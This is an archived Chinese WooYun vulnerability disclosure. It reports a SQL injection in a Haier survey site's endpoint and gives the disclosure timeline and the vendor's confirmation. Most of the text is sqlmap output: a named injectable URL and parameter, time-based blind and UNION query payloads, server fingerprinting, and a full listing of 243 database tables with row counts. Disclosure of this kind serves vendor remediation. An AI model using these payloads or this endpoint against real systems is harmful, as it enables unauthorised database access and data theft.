乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-16: 细节已通知厂商并且等待厂商处理中 2015-06-19: 厂商已经确认,细节仅向厂商公开 2015-06-29: 细节向核心白帽子及相关领域专家公开 2015-07-09: 细节向普通白帽子公开 2015-07-19: 细节向实习白帽子公开 2015-08-03: 细节向公众公开
注入点:http://s.haier.com/sr/ajax/getJirSassIcon.jsp?surveyid=
参数:surveyid
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: surveyid (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: surveyid=' AND (SELECT * FROM (SELECT(SLEEP(5)))VbuY) AND 'KVOw'='KVOw Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: surveyid=' UNION ALL SELECT NULL,CONCAT(0x716b6b6a71,0x664778526542576e6272,0x7178707171),NULL,NULL,NULL,NULL-- ---web server operating system: Windowsweb application technology: Apache 2.2.9, JSPback-end DBMS: MySQL 5.0.12Database: newsurveysqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: surveyid (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: surveyid=' AND (SELECT * FROM (SELECT(SLEEP(5)))VbuY) AND 'KVOw'='KVOw Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: surveyid=' UNION ALL SELECT NULL,CONCAT(0x716b6b6a71,0x664778526542576e6272,0x7178707171),NULL,NULL,NULL,NULL-- ---web server operating system: Windowsweb application technology: Apache 2.2.9, JSPback-end DBMS: MySQL 5.0.12Database: newsurvey[243 tables]+-------------------------------+| jir_fk_mydpf-bak20140919 || jir_fk_mydpf-bak20140923 || jir_fk_mydpf-bk14093001 || jir_fk_mydpf-bk140930 || jir_fk_mydpf-bk20140919-final || fc_bans || fc_bot || fc_bots || fc_config || fc_config_chats || fc_config_instances || fc_config_main || fc_config_values || fc_connections || fc_conversationlog || fc_dstore || fc_gmcache || fc_gossip || fc_ignors || fc_messages || fc_patterns || fc_paypal_log || fc_rooms || fc_templates || fc_thatindex || fc_thatstack || fc_users || jir_accessapily || jir_accesslogs || jir_accountsurvey || jir_activities || jir_activitytable || jir_addressbook || jir_advertise || jir_aggregates || jir_alliances || jir_annex || jir_answerip || jir_attachs || jir_blacklist || jir_blackwords || jir_busactive || jir_businesssurveys || jir_cartype || jir_citylevel || jir_config_param || jir_database || jir_dataprivileges || jir_dialogue || jir_discus_app || jir_discus_app_bak150421 || jir_discus_app_bak150427 || jir_discus_app_bak150431 || jir_discus_app_bak150605 || jir_discus_app_bak150612 || jir_discus_app_bak20150407 || jir_discus_app_bak20150410 || jir_discus_forms || jir_discus_forms_bak140617 || jir_discus_forms_bak140711 || jir_discus_forms_bak150507 || jir_discus_forms_bak150605 || jir_discus_reply || jir_discus_reply_bak140617 || jir_district || jir_dyproperty || jir_email_phone || jir_filterquestionindex || jir_fk_auth || jir_fk_email_log || jir_fk_embedded || jir_fk_embedded_bak140617 || jir_fk_embedded_bak150123 || jir_fk_huifu || jir_fk_jingyingti_count || jir_fk_jingyingti_info || jir_fk_jingyingti_log || jir_fk_jingyingti_pinglun || jir_fk_jingyingti_week_log || jir_fk_mydpf || jir_fk_mydpf_bak140617 || jir_fk_mydpf_bak150507 || jir_fk_mydpf_bak150605 || jir_fk_statistics || jir_fk_system_count || jir_fk_system_info || jir_fk_temp_pingjia || jir_fk_tmp_huifu || jir_fk_tmp_pingfen || jir_forum || jir_fourth_indicator_score || jir_fourthindicators || jir_freeze || jir_freply || jir_goldcoin || jir_groups || jir_guest_schedule || jir_haiersurvey || jir_indicator_score || jir_indicators || jir_integraldetails || jir_invertmember || jir_item || jir_item_operate_data || jir_item_tuser || jir_joinsurveystatus || jir_log || jir_logoutuser || jir_mac || jir_media || jir_mediadiv || jir_mediamould || jir_medianame || jir_medianode || jir_mediaresult || jir_message_board || jir_messages || jir_mobile_business || jir_mobileanswer || jir_modelnorm || jir_object_types || jir_objects || jir_observed || jir_observed_comment || jir_offlinedata || jir_operation || jir_orders || jir_otherservices || jir_paidalipay || jir_parameters || jir_permissions || jir_personactive || jir_pnmodel || jir_portal_use || jir_privileged_users || jir_privilegeopid || jir_privileges || jir_process || jir_project_info || jir_projectcontent || jir_projectprivilege || jir_psychological || jir_psychological_scores || jir_psychological_tests || jir_public_sample_lib || jir_publishaward || jir_quality_control || jir_quota || jir_quota_model || jir_quota_new || jir_recharge || jir_recharge_type || jir_recommendmembers || jir_recommendusers || jir_recordope || jir_release || jir_report_prepare || jir_report_prepare_detail || jir_reputation_degree_detail || jir_reputioninfo || jir_response_not_r || jir_responsequality || jir_result || jir_review || jir_role || jir_roleoperation || jir_saas || jir_saas_icon || jir_saas_survey || jir_saasadmin || jir_sad_value || jir_saminfo || jir_sample || jir_sample_car || jir_sample_conditions || jir_sample_financy || jir_sample_house || jir_sample_mapping || jir_sample_motherhood || jir_sampleinfo || jir_samplemobile || jir_samplemuetxanswer || jir_sampleservices || jir_search_seq || jir_sec_reply || jir_send_mroc || jir_sendemail || jir_sendtd8 || jir_statistics_on || jir_subjects || jir_survey_grouprand || jir_survey_properties || jir_survey_sent || jir_survey_upgrade || jir_surveyanswers || jir_surveycollections || jir_surveycount || jir_surveynode || jir_surveyrandom || jir_surveyreport || jir_surveyresponses || jir_sysuser || jir_tauthority || jir_tbaccessfail || jir_tbblackuser || jir_tbdistinguish || jir_td8unionsurvey || jir_td8unionsurveyuser || jir_temporary || jir_theme_model || jir_thirdindicators || jir_tmbody || jir_tproduct || jir_trole || jir_trole_authority || jir_union || jir_unionanswers || jir_unionregister || jir_unionweb || jir_upgrade_remind || jir_upresult || jir_usecount || jir_user || jir_user_testpl || jir_userinfo || jir_usersample || jir_validate_phone || jir_version || jir_video || jir_webpayorder || jir_wkmonitor || mail_delivertask || mail_owner || mail_sendlist || mroc_release || mroccoredb || phonelist || pre_forum_node || t_demands || t_department || t_idm_user || t_operationdepartment || users |+-------------------------------+Database: newsurvey+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| jir_surveyresponses | 841835 || jir_responsequality | 756593 || jir_unionanswers | 719054 || jir_businesssurveys | 672558 || jir_objects | 198708 || jir_aggregates | 195310 || jir_user | 172738 || jir_fk_statistics | 172603 || fc_patterns | 148533 || jir_mobile_business | 76269 || jir_user_testpl | 64421 || jir_addressbook | 50998 || jir_freply | 39119 || jir_result | 38321 || fc_templates | 22634 || jir_accesslogs | 20269 || jir_fk_mydpf | 16703 || jir_fk_mydpf_bak150605 | 16518 || jir_fk_mydpf_bak150507 | 15858 || jir_recordope | 12188 || jir_discus_forms_bak150507 | 9178 || jir_discus_forms | 8970 || jir_discus_forms_bak150605 | 8150 || jir_sec_reply | 7998 || `jir_fk_mydpf-bk14093001` | 7759 || `jir_fk_mydpf-bk140930` | 7688 || `jir_fk_mydpf-bak20140923` | 7259 || `jir_fk_mydpf-bk20140919-final` | 7182 || `jir_fk_mydpf-bak20140919` | 7054 || jir_fk_email_log | 5650 || jir_fk_jingyingti_pinglun | 5220 || jir_portal_use | 4151 || jir_discus_reply | 3987 || jir_fk_huifu | 3964 || jir_roleoperation | 3569 || jir_surveycount | 3335 || jir_fk_jingyingti_log | 2891 || jir_district | 2853 || jir_survey_sent | 1891 || jir_fk_tmp_pingfen | 1849 || jir_wkmonitor | 1846 || jir_fk_embedded | 1725 || jir_fk_embedded_bak150123 | 1560 || jir_quota_new | 1477 || fc_config_values | 1468 || fc_config | 1445 || jir_surveynode | 1380 || jir_operation | 1251 || jir_fk_mydpf_bak140617 | 1224 || mail_sendlist | 1132 || fc_messages | 851 || jir_discus_forms_bak140711 | 802 || jir_cartype | 668 || jir_fk_tmp_huifu | 659 || jir_fk_temp_pingjia | 621 || jir_userinfo | 593 || users | 593 || jir_usecount | 528 || jir_discus_reply_bak140617 | 517 || jir_fk_system_count | 455 || jir_fk_system_info | 455 || jir_discus_forms_bak140617 | 388 || jir_personactive | 381 || jir_fk_jingyingti_week_log | 370 || jir_discus_app | 313 || jir_discus_app_bak150612 | 311 || jir_discus_app_bak150605 | 304 || jir_citylevel | 297 || jir_discus_app_bak150431 | 292 || jir_discus_app_bak150427 | 283 || jir_haiersurvey | 276 || jir_discus_app_bak150421 | 271 || jir_fk_embedded_bak140617 | 266 || jir_discus_app_bak20150410 | 263 || jir_discus_app_bak20150407 | 258 || jir_survey_grouprand | 251 || jir_logoutuser | 230 || jir_forum | 227 || jir_quota_model | 213 || jir_tbaccessfail | 197 || jir_project_info | 170 || jir_projectprivilege | 151 || jir_sample_conditions | 144 || jir_saas | 134 || jir_sendtd8 | 133 || jir_medianode | 121 || jir_process | 112 || jir_guest_schedule | 109 || jir_joinsurveystatus | 108 || jir_mediamould | 107 || jir_saas_survey | 104 || jir_reputation_degree_detail | 103 || jir_busactive | 101 || jir_send_mroc | 96 || jir_indicator_score | 94 || jir_release | 94 || jir_fourth_indicator_score | 91 || jir_public_sample_lib | 87 || jir_thirdindicators | 87 || mail_delivertask | 80 || fc_users | 79 || jir_webpayorder | 76 || jir_item_tuser | 74 || jir_dyproperty | 73 || fc_rooms | 72 || jir_upgrade_remind | 61 || jir_item | 58 || jir_message_board | 55 || jir_sample | 51 || jir_item_operate_data | 42 || jir_mediaresult | 42 || jir_fk_auth | 41 || jir_tmbody | 39 || jir_quota | 36 || jir_survey_properties | 36 || jir_indicators | 35 || jir_psychological_scores | 35 || jir_media | 34 || jir_object_types | 34 || jir_fourthindicators | 30 || jir_sad_value | 29 || jir_pnmodel | 27 || fc_bot | 26 || jir_email_phone | 25 || jir_saminfo | 24 || jir_surveyreport | 23 || jir_statistics_on | 21 || jir_tbdistinguish | 20 || jir_sample_mapping | 17 || jir_saas_icon | 16 || jir_sysuser | 13 || jir_trole_authority | 13 || mail_owner | 13 || jir_dialogue | 12 || jir_filterquestionindex | 12 || jir_observed_comment | 11 || jir_theme_model | 10 || jir_fk_jingyingti_count | 9 || jir_fk_jingyingti_info | 9 || jir_validate_phone | 8 || jir_freeze | 7 || jir_psychological_tests | 7 || t_demands | 6 || jir_privileges | 5 || jir_tauthority | 5 || jir_td8unionsurveyuser | 5 || jir_trole | 5 || jir_unionweb | 5 || jir_accessapily | 4 || jir_blacklist | 4 || jir_psychological | 4 || jir_quality_control | 4 || jir_recharge_type | 4 || jir_saasadmin | 4 || jir_samplemobile | 4 || jir_tproduct | 4 || t_department | 4 || fc_config_main | 3 || jir_video | 3 || t_operationdepartment | 3 || fc_ignors | 2 || jir_config_param | 2 || jir_messages | 2 || jir_orders | 2 || jir_report_prepare | 2 || jir_report_prepare_detail | 2 || jir_search_seq | 2 || t_idm_user | 2 || fc_bots | 1 || fc_config_chats | 1 || fc_config_instances | 1 || fc_connections | 1 || jir_advertise | 1 || jir_blackwords | 1 || jir_permissions | 1 || jir_privileged_users | 1 || jir_reputioninfo | 1 || jir_response_not_r | 1 || jir_role | 1 || jir_sampleinfo | 1 || jir_subjects | 1 || jir_td8unionsurvey | 1 || jir_upresult | 1 |+---------------------------------+---------+
过滤
危害等级:高
漏洞Rank:16
确认时间:2015-06-19 18:34
感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无
